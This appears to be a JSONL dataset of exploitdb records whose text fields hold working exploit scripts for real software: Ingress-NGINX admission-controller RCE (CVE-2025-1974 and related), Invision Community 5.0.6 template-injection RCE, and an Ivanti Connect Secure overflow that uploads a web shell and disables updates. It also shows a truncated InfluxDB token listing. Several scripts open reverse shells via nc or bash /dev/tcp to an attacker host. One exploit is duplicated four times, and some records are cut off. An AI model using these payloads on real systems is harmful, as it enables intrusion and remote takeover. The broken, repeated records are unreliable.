write:orgs/87d0746948a3b3f5/sources\nread:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks\nread:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs\nread:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000\nread:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables\nread:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers\nread:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets\nread:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels\nread:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views\nread:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents\nread:orgs/87d0746948a3b3f5/notificationRules\nwrite:orgs/87d0746948a3b3f5/notificationRules\nread:orgs/87d0746948a3b3f5/notificationEndpoints\nwrite:orgs/87d0746948a3b3f5/notificationEndpoints\nread:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks\nread:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp\nread:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks\nread:orgs/87d0746948a3b3f5/annotations\nwrite:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes\nwrite:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications\nwrite:orgs/87d0746948a3b3f5/replications]\n\n# Listing all available tokens passing allAccess token and retrieving only\noperator level tokens\ninflux auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs\n\n0cbb920e128e5000 gerKYLO0Ph_ibUk0y{REDACTED}\nadmin 0cb9c92ee228b000 [read:/authorizations write:/authorizations\nread:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs\nwrite:/orgs read:/sources write:/sources read:/tasks write:/tasks\nread:/telegrafs write:/telegrafs read:/users write:/users read:/variables\nwrite:/variables read:/scrapers write:/scrapers read:/secrets\nwrite:/secrets read:/labels write:/labels read:/views write:/views\nread:/documents write:/documents read:/notificationRules\nwrite:/notificationRules r", "cve_id": "CVE-2024-30896", "source": "exploitdb", "timestamp": "2025-04-08T00:00:00+00:00"} {"id": "a37eca10749b94bdd1d7", "text": "Ingress-NGINX 4.11.0 - Remote Code Execution (RCE)\n\n# Exploit Title: Ingress-NGINX 4.11.0 - Remote Code Execution (RCE)\n# Google Dork: N/A\n# Date: 2025-06-19\n# Exploit Author: Likhith Appalaneni\n# Vendor Homepage: https://kubernetes.github.io/ingress-nginx/\n# Software Link: https://github.com/kubernetes/ingress-nginx\n# Version: ingress-nginx v4.11.0 on Kubernetes v1.29.0 (Minikube)\n# Tested on: Ubuntu 24.04, Minikube vLatest, Docker vLatest\n# CVE : CVE-2025-1974\n\n1) Update the attacker ip and listening port in shell.c and Compile the shell payload:\ngcc -fPIC -shared -o shell.so shell.c\n\n2) Run the exploit:\npython3 exploit.py\n\nThe exploit sends a crafted AdmissionRequest to the vulnerable Ingress-NGINX webhook and loads the shell.so to achieve code execution.\n\n<---> shell.c <--->\n\n#include \n__attribute__((constructor)) void init() {\n system(\"sh -c 'nc attacker-ip attacker-port -e /bin/sh'\");\n}\n\n<---> shell.c <--->\n<---> exploit.py <--->\n\nimport json\nimport requests\nimport threading\nimport time\nimport urllib3\nimport socket\nimport argparse\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ndef upload_shell_via_socket(file_path, target_host, target_port):\n print(\"[*] Uploading shell.so via raw socket to keep FD open...\")\n try:\n with open(file_path, \"rb\") as f:\n data = f.read()\n data += b\"\\x00\" * (16384 - len(data) % 16384)\n content_len = len(data) + 2024\n\n payload = f\"POST /fake/addr HTTP/1.1\\r\\nHost: {target_host}:{target_port}\\r\\nContent-Type: application/octet-stream\\r\\nContent-Length: {content_len}\\r\\n\\r\\n\".encode(\"ascii\") + data\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((target_host, target_port))\n sock.sendall(payload)\n print(\"[*] Payload sent, holding connection open for 220s...\")\n time.sleep(220)\n sock.close()\n except Exception as e:\n print(f\"[!] Upload failed: {e}\")\n\ndef build_payload(pid, fd):\n annotation = \"http://x/#;\" + (\"}\" * 3) + f\"\\nssl_engine /proc/{pid}/fd/{fd};\\n#\"\n return {\n \"kind\": \"AdmissionReview\",\n \"apiVersion\": \"admission.k8s.io/v1\",\n \"request\": {\n \"uid\": \"exploit-uid\",\n \"kind\": {\n \"group\": \"networking.k8s.io\",\n \"version\": \"v1\",\n \"kind\": \"Ingress\"\n },\n \"resource\": {\n \"group\": \"networking.k8s.io\",\n \"version\": \"v1\",\n \"resource\": \"ingresses\"\n },\n \"requestKind\": {\n \"group\": \"networking.k8s.io\",\n \"version\": \"v1\",\n \"kind\": \"Ingress\"\n },\n \"requestResource\": {\n \"group\": \"networking.k8s.io\",\n \"version\": \"v1\",\n \"resource\": \"ingresses\"\n },\n \"name\": \"example-ingress\",\n \"operation\": \"CREATE\",\n \"userInfo\": {\n \"username\": \"kube-review\",\n \"uid\": \"d9c6bf40-e0e6-4cd9-a9f4-b6966020ed3d\"\n },\n \"object\": {\n \"kind\": \"Ingress\",\n \"apiVersion\": \"networking.k8s.io/v1\",\n \"metadata\": {\n \"name\": \"example-ingress\",\n \"annotations\": {\n \"nginx.ingress.kubernetes.io/auth-url\": annotation\n }\n },\n \"spec\": {\n \"ingressClassName\": \"nginx\",\n \"rules\": [\n {\n \"host\": \"hello-world.com\",\n \"http\": {\n \"paths\": [\n {\n \"path\": \"/\",\n \"pathType\": \"Prefix\",\n \"backend\": {\n \"service\": {\n \"name\": \"web\",\n \"port\": { \"number\": 8080 }\n }\n }\n }\n ]\n }\n }\n ]\n }\n },\n \"oldObject\": None,\n \"dryRun\": False,\n \"options\": {\n \"kind\": \"CreateOptions\",\n \"apiVersion\": \"meta.k8s.io/v1\"\n }\n }\n }\n\ndef send_requests(admission_url, pid_range, fd_range):\n for pid in range(pid_range[0], pid_range[1]):\n for fd in range(fd_range[0], fd_range[1]):\n print(f\"Trying /proc/{pid}/fd/{fd}\")\n payload = build_payload(pid, fd)\n try:\n resp = requests.post(\n f\"{admission_url}/networking/v1/ingresses\",\n headers={\"Content-Type\": \"application/json\"},\n ", "cve_id": "CVE-2025-1974", "source": "exploitdb", "timestamp": "2025-06-20T00:00:00+00:00"} {"id": "2f37d9bccc76468a77cf", "text": "Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE\n\n# Exploit Title: Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE\n# Date: 2025-10-07\n# Exploit Author: Beatriz Fresno Naumova\n# Vendor Homepage: https://kubernetes.io\n# Software Link: https://github.com/kubernetes/ingress-nginx\n# Version: Affects v1.10.0 to v1.11.1 (potentially others)\n# Tested on: Ubuntu 22.04, RKE2 Kubernetes Cluster\n# CVE: CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974\n\nimport os\nimport sys\nimport socket\nimport requests\nimport threading\nfrom urllib.parse import urlparse\nfrom concurrent.futures import ThreadPoolExecutor\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# --- Embedded malicious shared object template ---\nMALICIOUS_C_TEMPLATE = \"\"\"\n#include \n\n__attribute__((constructor))\nvoid run_on_load() {\n system(\"bash -c 'bash -i >& /dev/tcp/HOST/PORT 0>&1'\");\n}\n\nint bind(void *e, const char *id) {\n return 1;\n}\n\nvoid ENGINE_load_evil() {}\n\nint bind_engine() {\n return 1;\n}\n\"\"\"\n\ndef compile_shared_library(host, port, output_file=\"evil_engine.so\"):\n c_code = MALICIOUS_C_TEMPLATE.replace(\"HOST\", host).replace(\"PORT\", str(port))\n\n with open(\"evil_engine.c\", \"w\") as f:\n f.write(c_code)\n\n print(\"[*] Compiling malicious shared object...\")\n result = os.system(\"gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto\")\n\n if result == 0:\n print(\"[+] Shared object compiled successfully.\")\n return True\n else:\n print(\"[!] Compilation failed. Is gcc installed?\")\n return False\n\n\ndef send_brute_request(admission_url, json_template, proc, fd):\n print(f\"[*] Trying /proc/{proc}/fd/{fd}\")\n path = f\"proc/{proc}/fd/{fd}\"\n payload = json_template.replace(\"REPLACE\", path)\n\n headers = {\"Content-Type\": \"application/json\"}\n url = admission_url.rstrip(\"/\") + \"/admission\"\n\n try:\n response = requests.post(url, data=payload, headers=headers, verify=False, timeout=5)\n print(f\"[+] Response for /proc/{proc}/fd/{fd}: {response.status_code}\")\n except Exception as e:\n print(f\"[!] Error on /proc/{proc}/fd/{fd}: {e}\")\n\n\ndef brute_force_admission(admission_url, json_file=\"review.json\", max_proc=50, max_fd=30, max_workers=5):\n try:\n with open(json_file, \"r\") as f:\n json_data = f.read()\n except FileNotFoundError:\n print(f\"[!] Error: {json_file} not found.\")\n return\n\n print(\"[*] Starting brute-force against the admission webhook...\")\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n for proc in range(1, max_proc):\n for fd in range(3, max_fd):\n executor.submit(send_brute_request, admission_url, json_data, proc, fd)\n\n\ndef upload_shared_library(ingress_url, shared_object=\"evil_engine.so\"):\n try:\n with open(shared_object, \"rb\") as f:\n evil_payload = f.read()\n except FileNotFoundError:\n print(f\"[!] Error: {shared_object} not found.\")\n return\n\n parsed = urlparse(ingress_url)\n host = parsed.hostname\n port = parsed.port or 80\n path = parsed.path or \"/\"\n\n try:\n sock = socket.create_connection((host, port))\n except Exception as e:\n print(f\"[!] Failed to connect to {host}:{port}: {e}\")\n return\n\n fake_length = len(evil_payload) + 10\n headers = (\n f\"POST {path} HTTP/1.1\\r\\n\"\n f\"Host: {host}\\r\\n\"\n f\"User-Agent: qmx-ingress-exploiter\\r\\n\"\n f\"Content-Type: application/octet-stream\\r\\n\"\n f\"Content-Length: {fake_length}\\r\\n\"\n f\"Connection: keep-alive\\r\\n\\r\\n\"\n ).encode(\"iso-8859-1\")\n\n print(\"[*] Uploading malicious shared object to ingress...\")\n sock.sendall(headers + evil_payload)\n\n response = b\"\"\n while True:\n chunk = sock.recv(4096)\n if not chunk:\n break\n response += chunk\n\n print(\"[*] Server response:\\n\")\n print(response.decode(errors=\"ignore\"))\n sock.close()\n\n\ndef main():\n if len(sys.argv) != 4:\n print(\"Usage: python3 exploit.py \")\n sys.exit(1)\n\n ingress_url = sys.argv[1]\n admission_url = sys.argv[2]\n rev_host_port = sys.argv[3]\n\n if ':' not in rev_host_port:\n print(\"[!] Invalid format for rev_host:port.\")\n sys.exit(1)\n\n host, port = rev_host_port.split(\":\")\n\n if not compile_shared_library(host, port):\n sys.exit(1)\n\n # Send the malicious shared object and keep the connection open\n upload_thread = threading.Thread(target=upload_shared_library, args=(ingress_url,))\n upload_thread.start()\n\n # Simultaneously brute-force the admission webhook for valid file descriptors\n brute_force_admission(admission_url)\n\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2025-24514", "source": "exploitdb", "timestamp": "2026-02-04T00:00:00+00:00"} {"id": "2f37d9bccc76468a77cf", "text": "Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE\n\n# Exploit Title: Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE\n# Date: 2025-10-07\n# Exploit Author: Beatriz Fresno Naumova\n# Vendor Homepage: https://kubernetes.io\n# Software Link: https://github.com/kubernetes/ingress-nginx\n# Version: Affects v1.10.0 to v1.11.1 (potentially others)\n# Tested on: Ubuntu 22.04, RKE2 Kubernetes Cluster\n# CVE: CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974\n\nimport os\nimport sys\nimport socket\nimport requests\nimport threading\nfrom urllib.parse import urlparse\nfrom concurrent.futures import ThreadPoolExecutor\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# --- Embedded malicious shared object template ---\nMALICIOUS_C_TEMPLATE = \"\"\"\n#include \n\n__attribute__((constructor))\nvoid run_on_load() {\n system(\"bash -c 'bash -i >& /dev/tcp/HOST/PORT 0>&1'\");\n}\n\nint bind(void *e, const char *id) {\n return 1;\n}\n\nvoid ENGINE_load_evil() {}\n\nint bind_engine() {\n return 1;\n}\n\"\"\"\n\ndef compile_shared_library(host, port, output_file=\"evil_engine.so\"):\n c_code = MALICIOUS_C_TEMPLATE.replace(\"HOST\", host).replace(\"PORT\", str(port))\n\n with open(\"evil_engine.c\", \"w\") as f:\n f.write(c_code)\n\n print(\"[*] Compiling malicious shared object...\")\n result = os.system(\"gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto\")\n\n if result == 0:\n print(\"[+] Shared object compiled successfully.\")\n return True\n else:\n print(\"[!] Compilation failed. Is gcc installed?\")\n return False\n\n\ndef send_brute_request(admission_url, json_template, proc, fd):\n print(f\"[*] Trying /proc/{proc}/fd/{fd}\")\n path = f\"proc/{proc}/fd/{fd}\"\n payload = json_template.replace(\"REPLACE\", path)\n\n headers = {\"Content-Type\": \"application/json\"}\n url = admission_url.rstrip(\"/\") + \"/admission\"\n\n try:\n response = requests.post(url, data=payload, headers=headers, verify=False, timeout=5)\n print(f\"[+] Response for /proc/{proc}/fd/{fd}: {response.status_code}\")\n except Exception as e:\n print(f\"[!] Error on /proc/{proc}/fd/{fd}: {e}\")\n\n\ndef brute_force_admission(admission_url, json_file=\"review.json\", max_proc=50, max_fd=30, max_workers=5):\n try:\n with open(json_file, \"r\") as f:\n json_data = f.read()\n except FileNotFoundError:\n print(f\"[!] Error: {json_file} not found.\")\n return\n\n print(\"[*] Starting brute-force against the admission webhook...\")\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n for proc in range(1, max_proc):\n for fd in range(3, max_fd):\n executor.submit(send_brute_request, admission_url, json_data, proc, fd)\n\n\ndef upload_shared_library(ingress_url, shared_object=\"evil_engine.so\"):\n try:\n with open(shared_object, \"rb\") as f:\n evil_payload = f.read()\n except FileNotFoundError:\n print(f\"[!] Error: {shared_object} not found.\")\n return\n\n parsed = urlparse(ingress_url)\n host = parsed.hostname\n port = parsed.port or 80\n path = parsed.path or \"/\"\n\n try:\n sock = socket.create_connection((host, port))\n except Exception as e:\n print(f\"[!] Failed to connect to {host}:{port}: {e}\")\n return\n\n fake_length = len(evil_payload) + 10\n headers = (\n f\"POST {path} HTTP/1.1\\r\\n\"\n f\"Host: {host}\\r\\n\"\n f\"User-Agent: qmx-ingress-exploiter\\r\\n\"\n f\"Content-Type: application/octet-stream\\r\\n\"\n f\"Content-Length: {fake_length}\\r\\n\"\n f\"Connection: keep-alive\\r\\n\\r\\n\"\n ).encode(\"iso-8859-1\")\n\n print(\"[*] Uploading malicious shared object to ingress...\")\n sock.sendall(headers + evil_payload)\n\n response = b\"\"\n while True:\n chunk = sock.recv(4096)\n if not chunk:\n break\n response += chunk\n\n print(\"[*] Server response:\\n\")\n print(response.decode(errors=\"ignore\"))\n sock.close()\n\n\ndef main():\n if len(sys.argv) != 4:\n print(\"Usage: python3 exploit.py \")\n sys.exit(1)\n\n ingress_url = sys.argv[1]\n admission_url = sys.argv[2]\n rev_host_port = sys.argv[3]\n\n if ':' not in rev_host_port:\n print(\"[!] Invalid format for rev_host:port.\")\n sys.exit(1)\n\n host, port = rev_host_port.split(\":\")\n\n if not compile_shared_library(host, port):\n sys.exit(1)\n\n # Send the malicious shared object and keep the connection open\n upload_thread = threading.Thread(target=upload_shared_library, args=(ingress_url,))\n upload_thread.start()\n\n # Simultaneously brute-force the admission webhook for valid file descriptors\n brute_force_admission(admission_url)\n\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2025-1974", "source": "exploitdb", "timestamp": "2026-02-04T00:00:00+00:00"} {"id": "2f37d9bccc76468a77cf", "text": "Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE\n\n# Exploit Title: Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE\n# Date: 2025-10-07\n# Exploit Author: Beatriz Fresno Naumova\n# Vendor Homepage: https://kubernetes.io\n# Software Link: https://github.com/kubernetes/ingress-nginx\n# Version: Affects v1.10.0 to v1.11.1 (potentially others)\n# Tested on: Ubuntu 22.04, RKE2 Kubernetes Cluster\n# CVE: CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974\n\nimport os\nimport sys\nimport socket\nimport requests\nimport threading\nfrom urllib.parse import urlparse\nfrom concurrent.futures import ThreadPoolExecutor\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# --- Embedded malicious shared object template ---\nMALICIOUS_C_TEMPLATE = \"\"\"\n#include \n\n__attribute__((constructor))\nvoid run_on_load() {\n system(\"bash -c 'bash -i >& /dev/tcp/HOST/PORT 0>&1'\");\n}\n\nint bind(void *e, const char *id) {\n return 1;\n}\n\nvoid ENGINE_load_evil() {}\n\nint bind_engine() {\n return 1;\n}\n\"\"\"\n\ndef compile_shared_library(host, port, output_file=\"evil_engine.so\"):\n c_code = MALICIOUS_C_TEMPLATE.replace(\"HOST\", host).replace(\"PORT\", str(port))\n\n with open(\"evil_engine.c\", \"w\") as f:\n f.write(c_code)\n\n print(\"[*] Compiling malicious shared object...\")\n result = os.system(\"gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto\")\n\n if result == 0:\n print(\"[+] Shared object compiled successfully.\")\n return True\n else:\n print(\"[!] Compilation failed. Is gcc installed?\")\n return False\n\n\ndef send_brute_request(admission_url, json_template, proc, fd):\n print(f\"[*] Trying /proc/{proc}/fd/{fd}\")\n path = f\"proc/{proc}/fd/{fd}\"\n payload = json_template.replace(\"REPLACE\", path)\n\n headers = {\"Content-Type\": \"application/json\"}\n url = admission_url.rstrip(\"/\") + \"/admission\"\n\n try:\n response = requests.post(url, data=payload, headers=headers, verify=False, timeout=5)\n print(f\"[+] Response for /proc/{proc}/fd/{fd}: {response.status_code}\")\n except Exception as e:\n print(f\"[!] Error on /proc/{proc}/fd/{fd}: {e}\")\n\n\ndef brute_force_admission(admission_url, json_file=\"review.json\", max_proc=50, max_fd=30, max_workers=5):\n try:\n with open(json_file, \"r\") as f:\n json_data = f.read()\n except FileNotFoundError:\n print(f\"[!] Error: {json_file} not found.\")\n return\n\n print(\"[*] Starting brute-force against the admission webhook...\")\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n for proc in range(1, max_proc):\n for fd in range(3, max_fd):\n executor.submit(send_brute_request, admission_url, json_data, proc, fd)\n\n\ndef upload_shared_library(ingress_url, shared_object=\"evil_engine.so\"):\n try:\n with open(shared_object, \"rb\") as f:\n evil_payload = f.read()\n except FileNotFoundError:\n print(f\"[!] Error: {shared_object} not found.\")\n return\n\n parsed = urlparse(ingress_url)\n host = parsed.hostname\n port = parsed.port or 80\n path = parsed.path or \"/\"\n\n try:\n sock = socket.create_connection((host, port))\n except Exception as e:\n print(f\"[!] Failed to connect to {host}:{port}: {e}\")\n return\n\n fake_length = len(evil_payload) + 10\n headers = (\n f\"POST {path} HTTP/1.1\\r\\n\"\n f\"Host: {host}\\r\\n\"\n f\"User-Agent: qmx-ingress-exploiter\\r\\n\"\n f\"Content-Type: application/octet-stream\\r\\n\"\n f\"Content-Length: {fake_length}\\r\\n\"\n f\"Connection: keep-alive\\r\\n\\r\\n\"\n ).encode(\"iso-8859-1\")\n\n print(\"[*] Uploading malicious shared object to ingress...\")\n sock.sendall(headers + evil_payload)\n\n response = b\"\"\n while True:\n chunk = sock.recv(4096)\n if not chunk:\n break\n response += chunk\n\n print(\"[*] Server response:\\n\")\n print(response.decode(errors=\"ignore\"))\n sock.close()\n\n\ndef main():\n if len(sys.argv) != 4:\n print(\"Usage: python3 exploit.py \")\n sys.exit(1)\n\n ingress_url = sys.argv[1]\n admission_url = sys.argv[2]\n rev_host_port = sys.argv[3]\n\n if ':' not in rev_host_port:\n print(\"[!] Invalid format for rev_host:port.\")\n sys.exit(1)\n\n host, port = rev_host_port.split(\":\")\n\n if not compile_shared_library(host, port):\n sys.exit(1)\n\n # Send the malicious shared object and keep the connection open\n upload_thread = threading.Thread(target=upload_shared_library, args=(ingress_url,))\n upload_thread.start()\n\n # Simultaneously brute-force the admission webhook for valid file descriptors\n brute_force_admission(admission_url)\n\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2025-1098", "source": "exploitdb", "timestamp": "2026-02-04T00:00:00+00:00"} {"id": "2f37d9bccc76468a77cf", "text": "Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE\n\n# Exploit Title: Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE\n# Date: 2025-10-07\n# Exploit Author: Beatriz Fresno Naumova\n# Vendor Homepage: https://kubernetes.io\n# Software Link: https://github.com/kubernetes/ingress-nginx\n# Version: Affects v1.10.0 to v1.11.1 (potentially others)\n# Tested on: Ubuntu 22.04, RKE2 Kubernetes Cluster\n# CVE: CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974\n\nimport os\nimport sys\nimport socket\nimport requests\nimport threading\nfrom urllib.parse import urlparse\nfrom concurrent.futures import ThreadPoolExecutor\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# --- Embedded malicious shared object template ---\nMALICIOUS_C_TEMPLATE = \"\"\"\n#include \n\n__attribute__((constructor))\nvoid run_on_load() {\n system(\"bash -c 'bash -i >& /dev/tcp/HOST/PORT 0>&1'\");\n}\n\nint bind(void *e, const char *id) {\n return 1;\n}\n\nvoid ENGINE_load_evil() {}\n\nint bind_engine() {\n return 1;\n}\n\"\"\"\n\ndef compile_shared_library(host, port, output_file=\"evil_engine.so\"):\n c_code = MALICIOUS_C_TEMPLATE.replace(\"HOST\", host).replace(\"PORT\", str(port))\n\n with open(\"evil_engine.c\", \"w\") as f:\n f.write(c_code)\n\n print(\"[*] Compiling malicious shared object...\")\n result = os.system(\"gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto\")\n\n if result == 0:\n print(\"[+] Shared object compiled successfully.\")\n return True\n else:\n print(\"[!] Compilation failed. Is gcc installed?\")\n return False\n\n\ndef send_brute_request(admission_url, json_template, proc, fd):\n print(f\"[*] Trying /proc/{proc}/fd/{fd}\")\n path = f\"proc/{proc}/fd/{fd}\"\n payload = json_template.replace(\"REPLACE\", path)\n\n headers = {\"Content-Type\": \"application/json\"}\n url = admission_url.rstrip(\"/\") + \"/admission\"\n\n try:\n response = requests.post(url, data=payload, headers=headers, verify=False, timeout=5)\n print(f\"[+] Response for /proc/{proc}/fd/{fd}: {response.status_code}\")\n except Exception as e:\n print(f\"[!] Error on /proc/{proc}/fd/{fd}: {e}\")\n\n\ndef brute_force_admission(admission_url, json_file=\"review.json\", max_proc=50, max_fd=30, max_workers=5):\n try:\n with open(json_file, \"r\") as f:\n json_data = f.read()\n except FileNotFoundError:\n print(f\"[!] Error: {json_file} not found.\")\n return\n\n print(\"[*] Starting brute-force against the admission webhook...\")\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n for proc in range(1, max_proc):\n for fd in range(3, max_fd):\n executor.submit(send_brute_request, admission_url, json_data, proc, fd)\n\n\ndef upload_shared_library(ingress_url, shared_object=\"evil_engine.so\"):\n try:\n with open(shared_object, \"rb\") as f:\n evil_payload = f.read()\n except FileNotFoundError:\n print(f\"[!] Error: {shared_object} not found.\")\n return\n\n parsed = urlparse(ingress_url)\n host = parsed.hostname\n port = parsed.port or 80\n path = parsed.path or \"/\"\n\n try:\n sock = socket.create_connection((host, port))\n except Exception as e:\n print(f\"[!] Failed to connect to {host}:{port}: {e}\")\n return\n\n fake_length = len(evil_payload) + 10\n headers = (\n f\"POST {path} HTTP/1.1\\r\\n\"\n f\"Host: {host}\\r\\n\"\n f\"User-Agent: qmx-ingress-exploiter\\r\\n\"\n f\"Content-Type: application/octet-stream\\r\\n\"\n f\"Content-Length: {fake_length}\\r\\n\"\n f\"Connection: keep-alive\\r\\n\\r\\n\"\n ).encode(\"iso-8859-1\")\n\n print(\"[*] Uploading malicious shared object to ingress...\")\n sock.sendall(headers + evil_payload)\n\n response = b\"\"\n while True:\n chunk = sock.recv(4096)\n if not chunk:\n break\n response += chunk\n\n print(\"[*] Server response:\\n\")\n print(response.decode(errors=\"ignore\"))\n sock.close()\n\n\ndef main():\n if len(sys.argv) != 4:\n print(\"Usage: python3 exploit.py \")\n sys.exit(1)\n\n ingress_url = sys.argv[1]\n admission_url = sys.argv[2]\n rev_host_port = sys.argv[3]\n\n if ':' not in rev_host_port:\n print(\"[!] Invalid format for rev_host:port.\")\n sys.exit(1)\n\n host, port = rev_host_port.split(\":\")\n\n if not compile_shared_library(host, port):\n sys.exit(1)\n\n # Send the malicious shared object and keep the connection open\n upload_thread = threading.Thread(target=upload_shared_library, args=(ingress_url,))\n upload_thread.start()\n\n # Simultaneously brute-force the admission webhook for valid file descriptors\n brute_force_admission(admission_url)\n\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2025-1097", "source": "exploitdb", "timestamp": "2026-02-04T00:00:00+00:00"} {"id": "02ed6fb776a549de950d", "text": "Invision Community 5.0.6 - Remote Code Execution (RCE)\n\n\\n\";\n\tprint \"\\nExample....: php $argv[0] http://localhost/invision/\";\n\tprint \"\\nExample....: php $argv[0] https://invisioncommunity.com/\\n\\n\";\n\tdie();\n}\n\n$ch = curl_init();\n\n$params = [\"app\" => \"core\", \"module\" => \"system\", \"controller\" => \"themeeditor\", \"do\" => \"customCss\"];\n\ncurl_setopt($ch, CURLOPT_URL, $argv[1]);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\n\nwhile (1)\n{\n\tprint \"\\ninvision-shell# \";\n\tif (($cmd = trim(fgets(STDIN))) == \"exit\") break;\n\t$params[\"content\"] = sprintf(\"{expression=\\\"die('________'.system(base64_decode('%s')))\\\"}\", base64_encode($cmd));\n\tcurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));\n\tpreg_match(\"/(.*)________/s\", curl_exec($ch), $m) ? print $m[1] : die(\"\\n[-] Exploit failed!\\n\\n\");\n}", "cve_id": "CVE-2025-47916", "source": "exploitdb", "timestamp": "2025-05-18T00:00:00+00:00"} {"id": "e9504f8dc3ed5de26df3", "text": "Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)\n\n# Exploit Title: Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)\n# Date: 2025-01-11\n# Exploit Author: @absholi7ly\n# CVE: CVE-2025-0282\n\nimport requests\nimport sys\nimport struct\nimport socket\nimport ssl\nimport urllib3\nimport time\n\n# Disable SSL warnings\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ndef create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):\n\n payload = b\"A\" * offset # Fill the buffer\n payload += struct.pack(\" /shell.php\"\n exploit_vulnerability(target_ip, command)\n print(\"[+] Web shell uploaded successfully at /shell.php.\")\n verify_shell(target_ip)\n\n except Exception as e:\n print(f\"[-] Error uploading web shell: {e}\")\n\ndef verify_shell(target_ip):\n\n shell_url = f\"http://{target_ip}/shell.php\"\n try:\n response = requests.get(shell_url, verify=False, timeout=10)\n if response.status_code == 200:\n print(\"[+] Web shell is accessible.\")\n else:\n print(f\"[-] Web shell is not accessible. HTTP status: {response.status_code}\")\n except Exception as e:\n print(f\"[-] Error verifying web shell: {e}\")\n\ndef execute_shell_command(target_ip, command):\n\n shell_url = f\"http://{target_ip}/shell.php\"\n try:\n # Sending the command via POST\n response = requests.post(shell_url, data={\"cmd\": command}, verify=False, timeout=10)\n if response.status_code == 200:\n print(f\"[+] Command output:\\n{response.text.strip()}\")\n else:\n print(f\"[-] Failed to execute command via shell. HTTP status: {response.status_code}\")\n except Exception as e:\n print(f\"[-] Error executing command via web shell: {e}\")\n\ndef disable_updates(target_ip):\n\n commands = [\n \"systemctl stop apt-daily.service\",\n \"systemctl disable apt-daily.service\"\n ]\n for command in commands:\n execute_shell_command(target_ip, command)\n print(\"[+] System updates disabled successfully.\")\n\n\ndef main():\n\n if len(sys.argv) != 3:\n print(\"Usage: python3 cve_2025_0282.py \")\n sys.exit(1)\n\n target_ip = sys.argv[1]\n local_shell_path = sys.argv[2]\n\n # Upload the web shell\n upload_web_shell(target_ip, local_shell_path)\n\n while True:\n command = input(\"Enter command to execute on the target (or 'exit' to quit): \")\n if command.lower() == \"exit\":\n print(\"Exiting...\")\n break\n\n execute_shell_command(target_ip, command)\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2025-0282", "source": "exploitdb", "timestamp": "2025-04-15T00:00:00+00:00"} {"id": "d3a114a62e1c9b5da936", "text": "Ivanti Endpoint Manager Mobile 12.5.0.0 - Authentication Bypass\n\n#!/usr/bin/env python3\n\n# Exploit Title: Ivanti Endpoint Manager Mobile 12.5.0.0 - Authentication Bypass\n# Google Dork: inurl:/mifs \"Ivanti\" OR \"EPM\" OR \"Endpoint Manager\"\n# Date: 2025-01-21\n# Exploit Author: [Your Name] (https://github.com/[your-username])\n# Vendor Homepage: https://www.ivanti.com/\n# Software Link: https://www.ivanti.com/products/endpoint-manager\n# Version: < 2025.1\n# Tested on: Ubuntu 22.04 LTS, Python 3.10\n# CVE: CVE-2025-4427, CVE-2025-4428\n\n# Description:\n# Ivanti Endpoint Manager (EPM) before version 2025.1 contains critical vulnerabilities:\n# 1. CVE-2025-4427: Expression Language Injection in featureusage API endpoint allowing RCE\n# 2. 